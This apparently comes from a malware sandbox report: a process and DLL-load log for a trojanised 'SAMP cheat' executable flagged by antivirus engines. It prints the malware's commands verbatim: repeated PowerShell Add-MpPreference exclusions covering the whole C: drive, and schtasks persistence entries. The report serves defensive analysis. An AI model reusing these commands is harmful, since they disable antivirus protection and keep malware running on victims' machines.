Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Virustotal: Detection: 56%
Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exe | ReversingLabs: Detection: 68%
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | File read: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe
Source: unknown | Process created: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe "C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe"
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\msportComWin\xtUjCOEXV8hvxooNRYyHQv7v29HXxWwl.vbe"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\msportComWin\5Jq5kgQebZBPc8KIFjklSaK6KtfwfF1rpT92XeRglY4x6Z5YYulxiLU9VV.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\msportComWin\BridgePortsurrogateserverref.exe "C:\msportComWin/BridgePortsurrogateserverref.exe"
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5fi0urd\m5fi0urd.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES63F2.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1E5328BD43674D66B913D17F64F40B9.TMP"
Source: unknown | Process created: C:\msportComWin\jnowHpJlZlXal.exe C:\msportComWin\jnowHpJlZlXal.exe
Source: unknown | Process created: C:\msportComWin\jnowHpJlZlXal.exe C:\msportComWin\jnowHpJlZlXal.exe
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qtco0uvf\qtco0uvf.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES6615.tmp" "c:\Windows\System32\CSC73DB2FDC8AEF4C699A318C77CEE246D.TMP"
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jnowHpJlZlXalj" /sc MINUTE /mo 13 /tr "'C:\Program Files\Uninstall Information\jnowHpJlZlXal.exe'" /rl HIGHEST /f
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "BridgePortsurrogateserverrefB" /sc MINUTE /mo 13 /tr "'C:\msportComWin\BridgePortsurrogateserverref.exe'" /f
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/msportComWin/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\msportComWin\jnowHpJlZlXal.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\jnowHpJlZlXal.exe'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\jnowHpJlZlXal.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\services.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\msportComWin\BridgePortsurrogateserverref.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\msportComWin\BridgePortsurrogateserverref.exe C:\msportComWin\BridgePortsurrogateserverref.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8SIf5KWJtt.bat"
Source: unknown | Process created: C:\msportComWin\BridgePortsurrogateserverref.exe C:\msportComWin\BridgePortsurrogateserverref.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Recovery\services.exe C:\Recovery\services.exe
Source: unknown | Process created: C:\Recovery\services.exe C:\Recovery\services.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\msportComWin\xtUjCOEXV8hvxooNRYyHQv7v29HXxWwl.vbe"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\msportComWin\5Jq5kgQebZBPc8KIFjklSaK6KtfwfF1rpT92XeRglY4x6Z5YYulxiLU9VV.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\msportComWin\BridgePortsurrogateserverref.exe "C:\msportComWin/BridgePortsurrogateserverref.exe"
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5fi0urd\m5fi0urd.cmdline"
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qtco0uvf\qtco0uvf.cmdline"
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/msportComWin/'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\msportComWin\jnowHpJlZlXal.exe'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\jnowHpJlZlXal.exe'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\jnowHpJlZlXal.exe'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\services.exe'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\msportComWin\BridgePortsurrogateserverref.exe'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8SIf5KWJtt.bat"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES63F2.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1E5328BD43674D66B913D17F64F40B9.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES6615.tmp" "c:\Windows\System32\CSC73DB2FDC8AEF4C699A318C77CEE246D.TMP"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: api-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: dxgidebug.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: sfc_os.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: policymanager.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: msvcp110_win.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: dlnashext.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wpdshext.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Section loaded: mscoree.dll
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Section loaded: apphelp.dll
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Section loaded: kernel.appcore.dll
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Section loaded: version.dll
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Section loaded: uxtheme.dll
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Section loaded: windows.storage.dll
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Section loaded: wldp.dll
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Section loaded: profapi.dll
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Section loaded: cryptsp.dll
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: dlnashext.dllJump to behavior
